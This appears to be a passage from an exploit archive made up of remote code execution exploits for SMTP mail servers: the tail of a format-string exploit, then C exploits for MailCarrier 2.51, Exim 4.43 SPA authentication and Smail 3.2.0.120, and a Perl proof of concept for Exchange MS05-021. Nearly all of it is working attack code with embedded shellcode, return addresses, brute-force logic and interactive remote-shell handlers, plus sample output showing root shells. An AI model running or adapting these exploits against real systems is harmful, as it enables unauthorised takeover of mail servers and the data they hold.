fprintf(stdout,"-> Connecting ... ");
fflush(stdout);
Sock = ConectToHost(Host,Port);
if(Sock == -1) fatal("Could not connect");
else fprintf(stdout,"OK\n");
fprintf(stdout,"-> Getting the banner ... ");
fflush(stdout);
if(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)
fprintf(stdout,"%s",Buffer);
else
fatal("RECV");
for(;STAGE<3;STAGE++)
{
fprintf(stdout,"\n*** STAGE %d ***\n\n",STAGE);
fprintf(stdout,"-> Creating EvilBuffer ... ");
fflush(stdout);
EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr);
fprintf(stdout,"OK\n");
fprintf(stdout,"-> Sending HELO with EvilBuffer ... ");
fflush(stdout);
SendBufferAndVerify(Sock,EvilBuffer,"250",0);
free(EvilBuffer);
fprintf(stdout,"-> Sending MAIL FROM with Shellcode ... ");
fflush(stdout);
// Create the string MAIL FROM NOP+SHELLCODE
strcpy(Mail_From,"mail from ");
memset(Mail_From+10,NOP,NOPSIZE);
Mail_From[10+NOPSIZE-1] = 0;
strcat(Mail_From,Shellcode);
strcat(Mail_From,"\n");
SendBufferAndVerify(Sock,Mail_From,"250",0);
fprintf(stdout,"-> Sending RCPT TO ... ");
fflush(stdout);
snprintf(Buffer,MAX_BUFFER,"rcpt to %s\n",Rcpt_TO);
SendBufferAndVerify(Sock,Buffer,"250","251");
fprintf(stdout,"-> Sending DATA ... ");
fflush(stdout);
sprintf(Buffer,"data\n");
SendBufferAndVerify(Sock,Buffer,"354",0);
fprintf(stdout,"-> Sending \".\" ... ");
fflush(stdout);
snprintf(Buffer,MAX_BUFFER,".\n");
SendBufferAndVerify(Sock,Buffer,"250",0);
}
fprintf(stdout,"-> Attacking ... ");
sprintf(Buffer,"quit\n");
SendBufferAndVerify(Sock,Buffer,"221",0);
fprintf(stdout,"\nTry to send some commands. If doesn't work, hit CTRL+C to exit\n\n");
doHack(Sock);
close(Sock);
}
void SendBufferAndVerify(int Sock, char *Buffer, char *Code1, char *Code2)
{
if(send(Sock,Buffer,strlen(Buffer),0) == -1)
fatal("SEND");
VerifyLastCommand(Sock,Code1,Code2);
}
void VerifyLastCommand(int Sock, char *Code1, char *Code2)
{
char Buffer[MAX_BUFFER];
if(recv(Sock,Buffer,MAX_BUFFER-1,0) != -1)
{
if(strstr(Buffer,Code1) || (Code2 && strstr(Buffer,Code2) )) fprintf(stdout,"OK\n",Buffer);
else
{
*strstr(Buffer,"\n") = 0;
fatal(Buffer);
}
}
else
fatal("RECV");
}
void Usage(char *Prog)
{
int i;
fprintf(stderr, "Usage: %s -h hostname <options>\n\n"
"Options:\n\n"
" -i ipaddress : Your IP address\n"
" -u rcpt_to : Select one valid destination\n"
" -t target : Select the target\n"
" -p portnumber : Sets a new port number <default: 25>\n\n"
"Targets:\n\n",Prog);
for(i=0;;i++)
{
if(Targets[i].Name != 0)
fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
else
break;
}
fprintf(stderr,"\n");
exit(1);
}
void fatal(char *ErrorMsg)
{
fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
exit(1);
}
int ConectToHost(char *Host,int Port)
{
struct sockaddr_in server;
struct hostent *hp;
int s;
server.sin_family = AF_INET;
hp = gethostbyname(Host);
if(!hp) return(-1);
memcpy(&server.sin_addr,hp->h_addr,hp->h_length);
server.sin_port = htons(Port);
s = socket(PF_INET,SOCK_STREAM,0);
if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)
return(-1);
return(s);
}
char *CreateEvilBuffer(int GOT, int Retaddr)
{
char *Buffer = malloc(500);
if(STAGE==1)
sprintf(Buffer,
"helo "PADDING
"%c%c%c%c" // GOT ADDR
"%%%ud" // LSW(EGGAddr)
"%%"BUFFER_OFFSET"$hn" // Write
"\n",
((u_long)GOT),
((u_long)GOT >> 8),
((u_long)GOT >> 16),
((u_long)GOT >> 24),
((Retaddr & 0x0000FFFF) - (27+IP_Len))
);
else
sprintf(Buffer,
"helo "PADDING
"%c%c%c%c" // GOT ADDR
"%%%ud" // LSW(EGGAddr)
"%%"BUFFER_OFFSET"$hn" // Write
"\n",
((u_long)GOT+2),
(((u_long)GOT+2) >> 8),
(((u_long)GOT+2) >> 16),
(((u_long)GOT+2) >> 24),
(((Retaddr & 0xFFFF0000)>>16) - (27+IP_Len))
);
return Buffer;
}
void doHack(int Sock)
{
char buffer[1024 * 10];
int count;
fd_set readfs;
write(Sock,"uname -a;id\n",12);
while(1)
{
FD_ZERO(&readfs);
FD_SET(STDIN, &readfs);
FD_SET(Sock, &readfs);
if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
{
if(FD_ISSET(STDIN, &readfs))
{
if((count = read(STDIN, buffer, 1024)) <= 0)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
{
close(Sock);
exit(-1);
}
}
write(Sock, buffer, count);
}
if(FD_ISSET(Sock, &readfs))
{
if((count = read(Sock, buffer, 1024)) <= 0)
{
if(errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
{
close(Sock);
exit(-1);
}
}
write(STDOUT, buffer, count);
}
}
}
}
// [2004-11-09]
25 MailCarrier 2.51 Remote Buffer Overflow Exploit
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4d\x81"
"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x 81\x0a\x12\x1b"
"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x 80\xb3\xcc\x07"
"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x 80\xb7\x76\xb2"
"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x 46\xb2\xb5\x76"
"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x 8d\x12\xcc\x17"
"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\x de\x07\x1a\x16"
"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x 8d\xd2\x1c\x51"
"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x 57\xd0\x80\xcc"
"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x 81\x59\x47\xdd"
"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\x c8\xdf\x0e\xe9"
"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x 6c\xa5\x7c\x1a"
"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x 56\xd0\x98\xc4"
"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x 7e\x0c\x43\x14"
"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\x b1\x68\x87\x1d"
"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\x b0\x82\x14\x1e"
"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\x d4\x7d\x14\x1a"
"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\x c2\x14\x03\x4d"
"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\x d8\xaa\xec\xca"
"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\x a5\x65\x46\x4c"
"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x 0c\x1d\x63\x5d"
"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x 7e\x2c\x47\x25"
"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\x f4\x59\x2f\xe0"
"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x 7e\x8a\xb8\x38"
"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x 7e\x89\x47";
struct sockaddr_in hrm,lar;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip,int port)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(port);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}
printf("[x] Connected to: %s PORT: %d\n",ip,port);
return sockfd;
}
int main(int argc, char *argv[])
{
char *buffer = malloc(5530),*crap = malloc(32),*t;
int x,y;
if(argc<2)
{
printf("Usage: TargetIP.\n");
exit(0);
}
printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
t=argv[1];
memset(buffer,'\0',5530);
memset(crap,0x41,32);
memset(buffer,0x90,5095);
strcat(buffer,RET);
strcat(buffer,crap);
strcat(buffer,shellcode);
x = conn(t,PORT);
printf("[x] Sending evil buffer..");
sleep(3);
write(x,"EHLO ",5);
sleep(1);
write(x,buffer,5530);
write(x,"\r\n\r\n",4);
sleep(2);
close(x);
printf("done.\n");
printf("[x] Trying to connect to port 31337..\n");
y = conn(t,RPORT);
printf("[x] 0wn3d!\n");
printf("\r\n");
shell(y);
}
// [2004-11-16]
25 Exim <= 4.43 auth_spa_server() Remote PoC Exploit
/* ecl-eximspa.c
* Yuri Gushin <[email protected]>
*
* Howdy :)
* This is pretty straightforward, an exploit for the recently
* discovered vulnerability in Exim's (all versions prior to and
* including 4.43) SPA authentication code - spa_base64_to_bits()
* will overflow a fixed-size buffer since there's no decent
* boundary checks before it in auth_spa_server()
*
* Greets fly out to the ECL crew, Alex Behar, Valentin Slavov
* blexim, manevski, elius, shrink, and everyone else who got left
* out :D
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <err.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <arpa/inet.h>
#define SC_PORT 13370
#define NOP 0xfd
struct {
char *name;
int retaddr;
} targets[] = {
{ "Bruteforce", 0xbfffffff },
{ "Debian Sarge exim4-daemon-heavy_4.34-9", 0xbfffed00 },
};
char sc[] = // thank you metasploit, skape, vlad902
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
struct {
struct sockaddr_in host;
int target;
int offset;
u_short wait;
} options;
static int brutemode;
int connect_port(u_short port);
void init_SPA(int sock);
void exploit(int sock, int address);
void shell(int sock);
void spa_bits_to_base64 (unsigned char *out, const unsigned char *in, int inlen);
void parse_options(int argc, char **argv);
void usage(char *cmd);
void banner(void);
int main(int argc, char **argv)
{
int address, sock_smtp, sock_shell;
banner();
parse_options(argc, argv);
address = targets[options.target].retaddr - options.offset;
brutemode = 0;
bruteforce:
if (!brutemode)
{
printf(" Connecting to %s:%d... ",
inet_ntoa(options.host.sin_addr), ntohs(options.host.sin_port));
fflush(stdout);
}
sock_smtp = connect_port(ntohs(options.host.sin_port));
if (!brutemode)
{
if (!sock_smtp)
{
printf("failed.\n\n");
exit(-1);
}
printf("success.\n");
}
init_SPA(sock_smtp);
exploit(sock_smtp, address);
close(sock_smtp);
printf(" Target: %s - 0x%.8x\n", targets[options.target].name, address);
printf(" Exploit sent, spawning a shell... ");
fflush(stdout);
sleep(1); // patience grasshopper
sock_shell = connect_port(SC_PORT);
if (!sock_shell && options.target)
{
printf("failed.\n\n");
exit(-1);
}
if (!sock_shell)
{
printf("failed.\n\n");
address -= 1000 - strlen(sc);
brutemode = 1;
if (options.wait) sleep(options.wait);
goto bruteforce;
}
printf("success!\n\nEnjoy your shell :)\n\n");
shell(sock_shell);
return 0;
}
int connect_port(u_short port)
{
int sock;
struct sockaddr_in host;
memcpy(&host, &options.host, sizeof(options.host));
host.sin_port = ntohs(port);
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
return 0;
if(connect(sock, (struct sockaddr *)&host, sizeof(host)) < 0)
{
close(sock);
return 0;
}
return sock;
}
void init_SPA(int sock)
{
char buffer[1024];
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
buffer[255] = '\0';
if (!brutemode)
printf(" Server banner: %s", buffer);
write(sock, "EHLO ECL.PWNZ.J00\n", 18);
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
else
if (!brutemode && (!strstr(buffer, "NTLM")))
printf("[?] Server doesn't seem to support SPA, trying anyway\n");
write(sock, "AUTH NTLM\n", 10);
memset(buffer, 0, sizeof(buffer));
if (!read(sock, buffer, sizeof(buffer)))
err(-1, "read");
else
if (!brutemode && (!strstr(buffer, "334")))
{
printf("[!] SPA unsupported! Server responds: %s\n\n", buffer);
exit(1);
}
if (!brutemode) printf(" SPA (NTLM) supported\n");
}
void exploit(int sock, int address)
{
char exp[2000], exp_base64[2668];
int *address_p;
int i;
memset(exp, NOP, 1000);
memcpy(&exp[1000]-strlen(sc), sc, strlen(sc));
address_p = (int *)&exp[1000];
for (i=0; i<1000; i+=4)
*(address_p++) = address;
spa_bits_to_base64(exp_base64, exp, sizeof(exp));
write(sock, exp_base64, sizeof(exp_base64));
write(sock, "\n", 1);
}
void shell(int sock)
{
int n;
fd_set fd;
char buff[1024];
write(sock,"uname -a;id\n",12);
while(1)
{
FD_SET(sock, &fd);
FD_SET(0, &fd);
select(sock+1, &fd, NULL, NULL, NULL);
if( FD_ISSET(sock, &fd) )
{
n = read(sock, buff, sizeof(buff));
if (n < 0) err(1, "remote read");
write(1, buff, n);
}
if ( FD_ISSET(0, &fd) )
{
n = read(0, buff, sizeof(buff));
if (n < 0) err(1, "local read");
write(sock, buff, n);
}
}
}
char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";
void spa_bits_to_base64 (unsigned char *out, const unsigned char *in, int inlen)
{
for (; inlen >= 3; inlen -= 3)
{
*out++ = base64digits[in[0] >> 2];
*out++ = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)];
*out++ = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)];
*out++ = base64digits[in[2] & 0x3f];
in += 3;
}
if (inlen > 0)
{
unsigned char fragment;
*out++ = base64digits[in[0] >> 2];
fragment = (in[0] << 4) & 0x30;
if (inlen > 1)
fragment |= in[1] >> 4;
*out++ = base64digits[fragment];
*out++ = (inlen < 2) ? '=' : base64digits[(in[1] << 2) & 0x3c];
*out++ = '=';
}
*out = '\0';
}
void parse_options(int argc, char **argv)
{
int ch;
struct hostent *hn;
memset(&options, 0, sizeof(options));
options.host.sin_family = AF_INET;
options.host.sin_port = htons(25);
options.target = -1;
options.wait = 1;
while (( ch = getopt(argc, argv, "h:p:t:o:w:")) != -1)
switch(ch)
{
case 'h':
if ( (hn = gethostbyname(optarg)) == NULL)
errx(-1, "Unresolvable address\n");
memcpy(&options.host.sin_addr, hn->h_addr, hn->h_length);
break;
case 'p':
options.host.sin_port = htons((u_short)atoi(optarg));
break;
case 't':
if ((atoi(optarg) > (sizeof(targets)/8-1) || (atoi(optarg) < 0)))
errx(-1, "Bad target\n");
options.target = atoi(optarg);
break;
case 'o':
options.offset = atoi(optarg);
break;
case 'w':
options.wait = (u_short)atoi(optarg);
break;
case '?':
exit(1);
default:
usage(argv[0]);
}
if (!options.host.sin_addr.s_addr || (options.target == -1) )
usage(argv[0]);
}
void usage(char *cmd)
{
int i;
printf("Usage: %s [ -h host ] [ -p port ] [ -t target ] [ -o offset ] [ -w wait ]\n\n"
"\t-h: remote host\n"
"\t-p: remote port\n"
"\t-t: target return address (see below)\n"
"\t-o: return address offset\n"
"\t-w: seconds to wait before bruteforce reconnecting\n\n",
cmd);
printf("Targets:\n");
for (i=0; i<(sizeof(targets)/8); i++)
printf("%d - %s (0x%.8x)\n", i, targets[i].name, targets[i].retaddr);
printf("\n");
exit(1);
}
void banner(void)
{
printf("\t\tExim <= 4.43 SPA authentication exploit\n"
"\t\t Yuri Gushin <[email protected]>\n"
"\t\t\t ECL Team\n\n\n");
}
// [2005-02-12]
25 Smail 3.2.0.120 Remote Root Heap Overflow Exploit
/*
*
* 0
*
* smail preparse_address_1() heap bof remote root exploit
*
* infamous42md AT hotpop DOT com
*
* Shouts:
*
* BMF, wipe with the left, eat with the right
*
* Notes:
*
* You can't have any characters in overflow buffer that isspace() returns true
* for. The shellcode is clear of them, but if your return address or retloc
* has one you gotta figure out another one. My slack box has that situation,
* heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
* don't have anymore time to BS around with this and make perfect for any and
* all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
* If the heap you're targetting is the same way, then try filling it up using
* some other commands. If the GOT you're targetting is at such address than
* overwrite a return address on the stack. Surely there's a way, check out the
* source and be creative; I'm sure there are some memory leaks somewhere you
* can use to fill up heap as well.
*
* You might run into some ugliness trying to automate this for a couple
* reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
* for this cookie before calling free(). So you're going to need that aligned
* properly unless you can cook up a way to exploit it when it bails out in
* xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
* maybe you can be clever and do something there). Furthermore I found that
* when trying to trigger this multiple times the alignment was different each
* time. There are "definitely" more reliable ways to exploit this if you take
* a deeper look into code which I don't have time to do right now. The padding
* parameter controls the alignment and the size of the chunk being allocated.
* You'll probably have to play with it. Yes that's fugly.
*
* [[email protected]] ./a.out
* Usage: ./a.out < host > < padding > < retloc > < retaddr >
*
* [[email protected]] ./a.out localhost 64 0xbffff39c 0x8111ea0
* --{ Smack 1.oohaah
*
* --{ definitely, adv.:
* --{ 1. Having distinct limits
* --{ 2. Indisputable; certain
* --{ 3. Clearly defined; explicitly precise
*
* --{ Said HELO
*
* --{ Sent MAIL FROM overflow
*
* --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
*
* --{ Attempting to redefine the meaning of 'definitely'
*
* --{ Got a shell
*
* --{ Updating Webster's
* --{ definitely, adv.:
* --{ 1. See specious
*
* --{ For the linguistically challenged...
* --{ specious, adj. :
* --{ 1. Having the ring of truth or plausibility but actually fallacious
* --{ 2. Deceptively attractive
*
* id
* uid=0(root) gid=0(root)
* echo PWNED
* PWNED
*
* - Connection closed by user
*
*/
#include <stdio.h>
#include <ctype.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/select.h>
#include <arpa/inet.h>
/* */
#define BS 0x1000
#define SMTP_PORT 25
#define Z(x, len) memset((x), 0, (len))
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); exit(EXIT_FAILURE); }while(0)
/* fat bloated call them shell code */
#define SHELL_LEN (sizeof(sc)-1)
#define SHELL_PORT 6969
#define NOP 0x90
char sc[] =
"\xeb\x0e""notexploitable"
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x 04\x24\x02\x89\xe6\xb0\x02"
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\x cd\x80\x50\x6a\x01\x6a\x02"
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x 6a\x10\x56\x50\x89\xe1\xb0"
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x 31\xdb\xb0\x66\xb3\x04\xcd"
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\x cd\x80\x89\xc5\x31\xc0\x89"
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\x f6\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\x e1\x99\xb0\x6b\x2c\x60\xcd"
"\x80";
/* a dlmalloc chunk descriptor */
#define CHUNKSZ 0xfffffff8
#define CHUNKLEN sizeof(mchunk_t)
typedef struct _mchunk {
size_t dummy;
size_t prevsz;
size_t sz;
long fd;
long bk;
} mchunk_t;
/* */
ssize_t Send(int s, const void *buf, size_t len, int flags)
{
ssize_t n;
n = send(s, buf, len, flags);
if(n < 0)
die("send");
return n;
}
/* */
ssize_t Recv(int s, void *buf, size_t len, int flags)
{
ssize_t n;
n = recv(s, buf, len, flags);
if(n < 0)
die("recv");
return n;
}
/* */
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
bye("gethostbyname failed with error %s", hstrerror(h_errno));
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
die("socket");
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
return sock;
}
/* */
void shell(char *host, u_short port)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port);
printf("--{ Got a shell\n\n"
"--{ Updating Webster's\n"
"--{ definitely, adv.:\n"
"--{ 1. See specious\n\n"
"--{ For the linguistically challenged...\n"
"--{ specious, adj. :\n"
"--{ 1. Having the ring of truth or plausibility but "
"actually fallacious\n"
"--{ 2. Deceptively attractive\n\n"
);
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
l = read(0, buf, BS);
if(l < 0)
die("read");
else if(l == 0)
bye("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
bye("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(STDOUT_FILENO, buf, l) < 1)
die("write");
}
}
}
/* */
int parse_args(int argc, char **argv, char **host, int *npad,
u_int *retloc, u_int *retaddr)
{
if(argc < 5)
return 1;
*host = argv[1];
if(sscanf(argv[2], "%d", npad) != 1)
return 1;
if(sscanf(argv[3], "%x", retloc) != 1)
return 1;
if(sscanf(argv[4], "%x", retaddr) != 1)
return 1;
return 0;
}
/* */
void sploit(int sock, int npad, u_int retloc, u_int retaddr)
{
ssize_t n = 0;
u_char buf[BS], pad[BS], evil[BS];
mchunk_t chunk;
Z(buf, BS), Z(pad, BS), Z(evil, BS), Z(&chunk, CHUNKLEN);
/* read greeting */
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't even say hi");
/* send HELO */
n = snprintf(buf, BS, "HELO localhost\r\n");
Send(sock, buf, n, 0);
Z(buf, BS);
n = Recv(sock, buf, BS, 0);
if(n == 0)
bye("Server didn't respond to HELO");
printf("--{ Said HELO\n\n");
/*
* Build evil chunk overflow. The need to align chunk exactly makes this
* not so robust. In my short testing I wasn't able to get free() called
* directly on an area of memory we control. I'm sure you can though if you
* take some time to study process heap behavior. Note though that you'll
* have to fill in the magic cookie field that xmalloc()/xfree() and some
* other functions use, so you'll still need to have it aligned properly
* which defeats the whole purpose. This exploits the free() call on the
* buffer we overflow, so you have to align the next chunk accordingly.
* Anyhow on newest glibc there is a check for negative size field on the
* chunk being freed, and program dies if it is negative (the exact
* condition is not negative, but it has that effect pretty much, but go
* look yourself ;)), So the techniques outlined by gera in phrack don't
* work (being able to point all chunks at our two evil chunks). Check out
* most recent glibc code in _int_free() if you haven't already.
*/
memset(pad, 'A', npad);
chunk.dummy = CHUNKSZ;
chunk.prevsz = CHUNKSZ;
chunk.sz = CHUNKSZ;
chunk.fd = retloc - 12;
chunk.bk = retaddr;
memcpy(evil, &chunk, CHUNKLEN);
evil[CHUNKLEN] = 0;
/* send the overflow */
n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
Send(sock, buf, n, 0);
Z(buf, BS);
printf("--{ Sent MAIL FROM overflow\n\n");
#define SLEEP_TIME 15
setbuf(stdout, NULL);
printf("--{ Going for shell in ");
for(n = 0; n < SLEEP_TIME; n++){
printf("%d ", SLEEP_TIME-n);
sleep(1);
}
puts("\n");
}
/*
*/
int main(int argc, char **argv)
{
int sock = 0, npad = 0;
u_int retloc = 0, retaddr = 0;
char *host = NULL;
if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
printf("--{ Smack 1.oohaah\n\n");
sock = conn(host, SMTP_PORT);
printf("--{ definitely, adv.:\n"
"--{ 1. Having distinct limits\n"
"--{ 2. Indisputable; certain\n"
"--{ 3. Clearly defined; explicitly precise\n\n"
);
sploit(sock, npad, retloc, retaddr);
printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
shell(host, SHELL_PORT);
return EXIT_SUCCESS;
}
// [2005-03-28]
25 MS Exchange Server Remote Code Execution Exploit (MS05-021)
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";
my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x 51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0b\x51\x50\xbb\x5F" .
"\x0C\x59\x7C\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x 0D\x31\xd2\x52\x51" .
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\x72\x69\x59\x7C\x ff\xd0\xe8\xc4\xff" .
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x 4e\xe8\xc2\xff\xff" .
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x 4e\xe8\xc2\xff\xff" .
"\xff\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x 73\x74\x4e";
my $cmd="X-LINK2STATE CHUNK=";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 1st chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "\r\n";
send $socket, $request, 0;
print "[+] Sent 2nd chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
